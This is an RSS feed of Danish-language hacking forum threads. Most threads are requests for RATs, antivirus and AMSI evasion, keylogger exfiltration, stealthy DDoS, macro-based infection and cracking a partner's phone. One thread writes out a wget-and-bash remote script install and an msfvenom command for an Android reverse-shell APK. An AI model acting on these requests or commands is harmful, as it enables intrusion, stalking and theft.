<![CDATA[Shellsec - Diskussion]]> https://www.shellsec.pw/ Wed, 29 Apr 2026 21:05:05 +0000 MyBB <![CDATA[Robocall tjeneste]]> https://www.shellsec.pw/traad-robocall-tjeneste Tue, 13 Apr 2021 21:55:47 +0200 https://www.shellsec.pw/traad-robocall-tjeneste <![CDATA[Crypter/Packer]]> https://www.shellsec.pw/traad-crypter-packer Wed, 29 Apr 2020 18:31:13 +0200 https://www.shellsec.pw/traad-crypter-packer Hvad er det nyeste nye for AV evasion?]]> Hvad er det nyeste nye for AV evasion?]]> <![CDATA[fast harddisk bogstav]]> https://www.shellsec.pw/traad-fast-harddisk-bogstav Thu, 13 Feb 2020 16:09:59 +0100 https://www.shellsec.pw/traad-fast-harddisk-bogstav
Kan man gøre sådan at et USB stik altid har det samme bogstaver, eller i hvertfald prøver på at få det samme, lige gyldigt hvilken computer du stikker det i.

hvis man nu satte den til :X  var der større change for at den altid var den samme. 

når jeg har den i min stationærer PC hedder den :G

og når jeg stikker den i min bærbar hedder den :M

kan man sætte den til at altid at prøve med det samme bogstav først. `??

PÅ FORHÅND TAK.]]>
Kan man gøre sådan at et USB stik altid har det samme bogstaver, eller i hvertfald prøver på at få det samme, lige gyldigt hvilken computer du stikker det i.

hvis man nu satte den til :X  var der større change for at den altid var den samme. 

når jeg har den i min stationærer PC hedder den :G

og når jeg stikker den i min bærbar hedder den :M

kan man sætte den til at altid at prøve med det samme bogstav først. `??

PÅ FORHÅND TAK.]]> <![CDATA[misbruge en teamviwer session]]> https://www.shellsec.pw/traad-misbruge-en-teamviwer-session Tue, 12 Nov 2019 18:04:00 +0100 https://www.shellsec.pw/traad-misbruge-en-teamviwer-session Jeg er uskyldigt offer for en scam gruppe som så gerne vil havde mig til at investere i  cryptovaluta investerings systemer, ...
ok næsten uskyldig, jeg har brugt mig selv lidt som honning.
de kan godt li´ teamviewer, er der nogen der kender til nogen reverse tricks bag en teamviwer session?
jeg har dem i en virtual maskine i en DMZ zone med strenge fw regler for traffik, men hvad kan jeg få ud af dette?
Foreslag??]]> Jeg er uskyldigt offer for en scam gruppe som så gerne vil havde mig til at investere i  cryptovaluta investerings systemer, ...
ok næsten uskyldig, jeg har brugt mig selv lidt som honning.
de kan godt li´ teamviewer, er der nogen der kender til nogen reverse tricks bag en teamviwer session?
jeg har dem i en virtual maskine i en DMZ zone med strenge fw regler for traffik, men hvad kan jeg få ud af dette?
Foreslag??]]> <![CDATA[Rat anbefaling til scam gruppe]]> https://www.shellsec.pw/traad-rat-anbefaling-til-scam-gruppe Tue, 12 Nov 2019 17:56:36 +0100 https://www.shellsec.pw/traad-rat-anbefaling-til-scam-gruppe Jeg har igennem længere tid opnået et særligt forhold til en scammer gruppe, så en af dem stoler ubetinget på mig,
kan jeg mærke, så jeg er ret sikker på han vil åbne hvad jeg sender til ham via email, han tror jeg er lidt tilbage, evnesvag, og han er sikker på at han kan udnytte mig.
dette faktum kan jeg jo bruge. så jeg er sikker på jeg har nøgle orderne til at få ham til at klikke på link i en mail.

Hvad for et tool vil være bedst, som ikke opsnappes af av evt, crunched el . runtime encrypted, som giver mig web cam access og fil adgang, og remote key logging
mange store fine krav, men lidt har også ret, så kan jeg jo bygge vidre, måske...
kunne være fedt fuld adgang til at scanne det net han er på, fordi de er en hel organisation kan jeg hører (call center).
/Foggy]]> Jeg har igennem længere tid opnået et særligt forhold til en scammer gruppe, så en af dem stoler ubetinget på mig,
kan jeg mærke, så jeg er ret sikker på han vil åbne hvad jeg sender til ham via email, han tror jeg er lidt tilbage, evnesvag, og han er sikker på at han kan udnytte mig.
dette faktum kan jeg jo bruge. så jeg er sikker på jeg har nøgle orderne til at få ham til at klikke på link i en mail.

Hvad for et tool vil være bedst, som ikke opsnappes af av evt, crunched el . runtime encrypted, som giver mig web cam access og fil adgang, og remote key logging
mange store fine krav, men lidt har også ret, så kan jeg jo bygge vidre, måske...
kunne være fedt fuld adgang til at scanne det net han er på, fordi de er en hel organisation kan jeg hører (call center).
/Foggy]]> <![CDATA[.Phobos malware dekryptering]]> https://www.shellsec.pw/traad-phobos-malware-dekryptering--7986 Sun, 27 Oct 2019 15:24:59 +0100 https://www.shellsec.pw/traad-phobos-malware-dekryptering--7986 Jeg har været så uheldig, at få malwaren .phobos ned på pcen. Alt på min PC er dekrypteret. Min eksterne harddisk som var tilsluttet er den vigtigste del af processen. Jeg har alt fra 2000, familie billeder osv. osv. som også er blevet krypteret. PCen er for længst formateret og er oppe og køre uden problemer.
Er der nogen der har været ude for det samme? Jeg har været rundt på alle sider og undersøgt uden held.]]> Jeg har været så uheldig, at få malwaren .phobos ned på pcen. Alt på min PC er dekrypteret. Min eksterne harddisk som var tilsluttet er den vigtigste del af processen. Jeg har alt fra 2000, familie billeder osv. osv. som også er blevet krypteret. PCen er for længst formateret og er oppe og køre uden problemer.
Er der nogen der har været ude for det samme? Jeg har været rundt på alle sider og undersøgt uden held.]]> <![CDATA[Exchange og external warning]]> https://www.shellsec.pw/traad-exchange-og-external-warning Wed, 23 Oct 2019 08:25:08 +0200 https://www.shellsec.pw/traad-exchange-og-external-warning
Kan man på en eller anden måde snyde en Exchange server, der kører med den der advarsel omkring denne mail er sendt fra en external, til at tro at mailen er fra en intern adresse så boksen ikke kommer?]]>
Kan man på en eller anden måde snyde en Exchange server, der kører med den der advarsel omkring denne mail er sendt fra en external, til at tro at mailen er fra en intern adresse så boksen ikke kommer?]]> <![CDATA[Powershell eksekvering og AMSI bypass]]> https://www.shellsec.pw/traad-powershell-eksekvering-og-amsi-bypass Thu, 11 Apr 2019 23:33:05 +0200 https://www.shellsec.pw/traad-powershell-eksekvering-og-amsi-bypass
Der er sjældent diskussioner om tekniske emner herinde, men nu prøver jeg alligevel.
Powershell Empire's stagers bliver opsnappet af windows defender gennem AMSI, hvad jeg kan lurer mig frem til kører den stadig AMSIScanString og ikke kun AMSIScanBuffer, som jeg ellers havde formodet var lukket af Microsoft.

Jeg mener at jeg kan bypasse AMSIScanBuffer, men jeg har problemer med AMSIScanString. Hvilke obfuskeringsmetoder kender i til, som omgår windows defender AMSI på en fuldt patched windows 10?

Jeg prøver at lege lidt med Invoke-Obfuscation, dog uden held indtil vidre.
Nuværende Invoke-Obfuscation streng er "Token\All\1,Encoding\1,Launcher\STDIN++\234"]]>
Der er sjældent diskussioner om tekniske emner herinde, men nu prøver jeg alligevel.
Powershell Empire's stagers bliver opsnappet af windows defender gennem AMSI, hvad jeg kan lurer mig frem til kører den stadig AMSIScanString og ikke kun AMSIScanBuffer, som jeg ellers havde formodet var lukket af Microsoft.

Jeg mener at jeg kan bypasse AMSIScanBuffer, men jeg har problemer med AMSIScanString. Hvilke obfuskeringsmetoder kender i til, som omgår windows defender AMSI på en fuldt patched windows 10?

Jeg prøver at lege lidt med Invoke-Obfuscation, dog uden held indtil vidre.
Nuværende Invoke-Obfuscation streng er "Token\All\1,Encoding\1,Launcher\STDIN++\234"]]> <![CDATA[Ring0 rootkit]]> https://www.shellsec.pw/traad-ring0-rootkit Thu, 14 Mar 2019 20:28:58 +0100 https://www.shellsec.pw/traad-ring0-rootkit
Jeg er blevet infected med et persistent ring0 rootkit, kørende både på min desktop maskine og laptops.
Normal anti-virus / anti-rootkit tools kan ikke finde noget, så jeg tror at rootkittet starter før det aktuelle operativ system.
Jeg har kun skiftet SSD i denne maskine, men det fixede ingenting.

Jeg har prøvet nærmest alle anti-virus og anti-rootkit tool der ude, men uden held. Men det ligner GMER og PChunter er de eneste tools som finder noget.
Jeg får mærkelige entries i process-tabben under GMER, og har lagt mærke til nogle mærkelige executables kørende blandt processer, men de kører i kernelmode og kan kun blive set af GMER.

Her er et screenshot af GMER: @imgur
Her er en log fra PChunter: @pastebin

Jeg har prøvet at geninstallere min PC på forskellige måder og har testet med Windows 7, Windows 8.1 og Windows 10. Jeg har b rugt DBAN og PartedMagic til at wipe alle diske, formateret og geinstalleret men jeg bliver ved med at blive infected. Alt førnævnt kommer igen. Mit rig er decent men performer af helvede til og jeg er 100% sikker på det ikke er faulty hardware, fordi jeg har samme behaviour på forskellige maskiner.
 
Enhver feedback ville være fucking fedt, har prøvet så meget og er ved at blive desperat!

regards,
nomsayin]]>
Jeg er blevet infected med et persistent ring0 rootkit, kørende både på min desktop maskine og laptops.
Normal anti-virus / anti-rootkit tools kan ikke finde noget, så jeg tror at rootkittet starter før det aktuelle operativ system.
Jeg har kun skiftet SSD i denne maskine, men det fixede ingenting.

Jeg har prøvet nærmest alle anti-virus og anti-rootkit tool der ude, men uden held. Men det ligner GMER og PChunter er de eneste tools som finder noget.
Jeg får mærkelige entries i process-tabben under GMER, og har lagt mærke til nogle mærkelige executables kørende blandt processer, men de kører i kernelmode og kan kun blive set af GMER.

Her er et screenshot af GMER: @imgur
Her er en log fra PChunter: @pastebin

Jeg har prøvet at geninstallere min PC på forskellige måder og har testet med Windows 7, Windows 8.1 og Windows 10. Jeg har b rugt DBAN og PartedMagic til at wipe alle diske, formateret og geinstalleret men jeg bliver ved med at blive infected. Alt førnævnt kommer igen. Mit rig er decent men performer af helvede til og jeg er 100% sikker på det ikke er faulty hardware, fordi jeg har samme behaviour på forskellige maskiner.
 
Enhver feedback ville være fucking fedt, har prøvet så meget og er ved at blive desperat!

regards,
nomsayin]]> <![CDATA[Keylogger]]> https://www.shellsec.pw/traad-keylogger--6702 Thu, 14 Mar 2019 16:26:08 +0100 https://www.shellsec.pw/traad-keylogger--6702
Hvad ville være den nemmeste måde at sende keylogger data fra en computer til en anden?

Mail, FTP...?]]>
Hvad ville være den nemmeste måde at sende keylogger data fra en computer til en anden?

Mail, FTP...?]]> <![CDATA[Typer af persistance]]> https://www.shellsec.pw/traad-typer-af-persistance Tue, 11 Dec 2018 13:54:08 +0100 https://www.shellsec.pw/traad-typer-af-persistance Der findes de standard Registry ændringer, til at køre et program ved startup, det er også muligt at oprette med TaskScheduler. Disse er dog meget udbredt.
Jeg tænker at lege med at modificere filer som ellers bliver kørt ved startup, eller ved start af et program som ofte køres (f.eks. browseren). DLL hijacking eller lign.
Hvilke andre kreative måder kan i komme på? Det er en sjov "øvelse" i at tænke ud af boksen.]]> Der findes de standard Registry ændringer, til at køre et program ved startup, det er også muligt at oprette med TaskScheduler. Disse er dog meget udbredt.
Jeg tænker at lege med at modificere filer som ellers bliver kørt ved startup, eller ved start af et program som ofte køres (f.eks. browseren). DLL hijacking eller lign.
Hvilke andre kreative måder kan i komme på? Det er en sjov "øvelse" i at tænke ud af boksen.]]> <![CDATA[Ddos]]> https://www.shellsec.pw/traad-ddos--6513 Tue, 11 Dec 2018 10:21:23 +0100 https://www.shellsec.pw/traad-ddos--6513 Jeg leder efter den bedste metode til at ddos nogen har linux kali og vil også gerne så lidt som muligt blive opdaget i det
Så hvad vil i sige er den beste metode]]> Jeg leder efter den bedste metode til at ddos nogen har linux kali og vil også gerne så lidt som muligt blive opdaget i det
Så hvad vil i sige er den beste metode]]> <![CDATA[Hjælp til word rat infektion]]> https://www.shellsec.pw/traad-hjaelp-til-word-rat-infektion Wed, 24 Oct 2018 16:50:25 +0200 https://www.shellsec.pw/traad-hjaelp-til-word-rat-infektion
Jeg søger hjælp til at få fuld adgang til offerets computer, via word dokument

Har ikke det store kendskab til infektion, så betaler gerne

//Bobby]]>
Jeg søger hjælp til at få fuld adgang til offerets computer, via word dokument

Har ikke det store kendskab til infektion, så betaler gerne

//Bobby]]> <![CDATA[Termux - Metasploit - Directory nonexisting]]> https://www.shellsec.pw/traad-termux-metasploit-directory-nonexisting Thu, 06 Sep 2018 13:21:49 +0200 https://www.shellsec.pw/traad-termux-metasploit-directory-nonexisting Fandt det her dejlige Android linux emulator (Termux) og har leget lidt rundt med det.
fik installeret metasploit ved at bruge:

"cd $HOME"
"pkg install wget"
"wget https://auxilus.github.io/metasploit.sh"
"bash metasploit.sh"

 og har nu prøvet at lave et RAT. MEN jeg kan ikke finde den rette path

msfvenom -p android/meterpreter/reverse_tcp LHOST=(MIN IP) LPORT:(Random Port) R> /sdcard/rat.apk
eller /storage/dcim/rat.apk 

jeg bliver ved med at få beskeden at min "Directory nonexisting" 
jeg har prøvet at køre "termux-setup-storage" og givet tilladelse på telefonen
så problemet er jeg ved ikke hvordan jeg gemmer på den rette path når det er er på en Android enhed]]> Fandt det her dejlige Android linux emulator (Termux) og har leget lidt rundt med det.
fik installeret metasploit ved at bruge:

"cd $HOME"
"pkg install wget"
"wget https://auxilus.github.io/metasploit.sh"
"bash metasploit.sh"

 og har nu prøvet at lave et RAT. MEN jeg kan ikke finde den rette path

msfvenom -p android/meterpreter/reverse_tcp LHOST=(MIN IP) LPORT:(Random Port) R> /sdcard/rat.apk
eller /storage/dcim/rat.apk 

jeg bliver ved med at få beskeden at min "Directory nonexisting" 
jeg har prøvet at køre "termux-setup-storage" og givet tilladelse på telefonen
så problemet er jeg ved ikke hvordan jeg gemmer på den rette path når det er er på en Android enhed]]> <![CDATA[Rats]]> https://www.shellsec.pw/traad-rats Tue, 28 Aug 2018 03:18:53 +0200 https://www.shellsec.pw/traad-rats
Tak på forhånd :)]]>
Tak på forhånd :)]]> <![CDATA[RAT via makro?]]> https://www.shellsec.pw/traad-rat-via-makro Wed, 22 Aug 2018 17:58:32 +0200 https://www.shellsec.pw/traad-rat-via-makro Jeg er ny til det her RATTING fis, og har lige leget lidt med Eggshell som egentligt fungerer udemærket. 
Jeg tænkte på om det er muligt at gøre således, at en kommando bliver kørt i cmd / terminal, når de åbner et word dokument med en macro?
- Skal lige siges at jeg ikke hverken ved om jeg er helt ude og skide, eller om det faktisk kan lade sig gøre; derfor jeg spørger om hjælp. 

Hvis ja, hvordan dælen laver jeg så den macro?]]> Jeg er ny til det her RATTING fis, og har lige leget lidt med Eggshell som egentligt fungerer udemærket. 
Jeg tænkte på om det er muligt at gøre således, at en kommando bliver kørt i cmd / terminal, når de åbner et word dokument med en macro?
- Skal lige siges at jeg ikke hverken ved om jeg er helt ude og skide, eller om det faktisk kan lade sig gøre; derfor jeg spørger om hjælp. 

Hvis ja, hvordan dælen laver jeg så den macro?]]> <![CDATA[Novicens desperation]]> https://www.shellsec.pw/traad-novicens-desperation Fri, 20 Jul 2018 10:52:09 +0200 https://www.shellsec.pw/traad-novicens-desperation Vi snakker en IPhone 6s. 

Jeg er desperat og må have klarhed. Vh
(20-07-2018, 09:52)Enb Skrev: Hej herinde. Er der nogen kan fortælle lidt om muligheden for at cracke en persons mobilkode? 
Vi snakker en IPhone 6s. 

Jeg er desperat og må have klarhed. Vh

Og med klarhed mener jeg selvfølgelig ift hvad der foregår på min partners telefon. Jeg er for ganmel til at lade tiden gå. Alt hjælp tages imod med største taknemmelighed.]]> Vi snakker en IPhone 6s. 

Jeg er desperat og må have klarhed. Vh
(20-07-2018, 09:52)Enb Skrev: Hej herinde. Er der nogen kan fortælle lidt om muligheden for at cracke en persons mobilkode? 
Vi snakker en IPhone 6s. 

Jeg er desperat og må have klarhed. Vh

Og med klarhed mener jeg selvfølgelig ift hvad der foregår på min partners telefon. Jeg er for ganmel til at lade tiden gå. Alt hjælp tages imod med største taknemmelighed.]]> <![CDATA[0day hack på min Iphone]]> https://www.shellsec.pw/traad-0day-hack-paa-min-iphone Fri, 18 May 2018 14:03:15 +0200 https://www.shellsec.pw/traad-0day-hack-paa-min-iphone Jeg har ikke vild forstand på IT udover til husbehov. Men hackerne bliver ved med at hacke min iphone. Har den nyeste opdatering fra apple, så vi kan vel godt kalde den for en 0day hack.

Nogle der kan hjælpe?

/Jimmi]]> Jeg har ikke vild forstand på IT udover til husbehov. Men hackerne bliver ved med at hacke min iphone. Har den nyeste opdatering fra apple, så vi kan vel godt kalde den for en 0day hack.

Nogle der kan hjælpe?

/Jimmi]]> <![CDATA[Bedste antivirus?]]> https://www.shellsec.pw/traad-bedste-antivirus Fri, 13 Apr 2018 12:28:58 +0200 https://www.shellsec.pw/traad-bedste-antivirus <![CDATA[Mistanke om mulig trojan]]> https://www.shellsec.pw/traad-mistanke-om-mulig-trojan Fri, 24 Nov 2017 23:31:18 +0100 https://www.shellsec.pw/traad-mistanke-om-mulig-trojan